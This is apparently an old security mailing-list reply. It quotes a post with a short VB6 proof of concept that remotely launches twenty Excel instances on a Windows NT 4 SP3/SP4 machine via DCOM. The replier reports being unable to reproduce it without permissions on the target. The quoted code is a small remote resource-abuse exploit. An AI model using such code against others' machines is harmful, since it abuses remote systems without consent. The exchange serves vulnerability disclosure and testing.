First off, Could not run the program without proper permission on the target
machine. Then, could not recreate on SP3 or SP4. The program just went
through it's paces with no action resulting.

Targets were NT 4 with SP3 and SP4, both with Office 97
Source machine was WIN95 OSR2 with VB6 SP3.

>Using the code below I was able to create 20 instances of Excel on my
>co-workers machines without modifying their machines at all.  The target
>must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
>prevent the attack.
>
>Private Sub Command1_Click()
>    Dim xlObj As Object
>    Dim xlCollection As New Collection
>    Dim i As Long
>    For i = 1 To 20
>        Set xlObj = CreateObject("Excel.Application", "\\NTBox")
>        xlCollection.Add xlObj
>    Next i
>
>    i = 1
>    'clean up
>    While xlCollection.Count > 0
>        xlCollection.Remove (xlCollection.Count)
>    Wend
>    Set xlCollection = Nothing
>End Sub
>
>-Robert E. Lempke

Reply via email to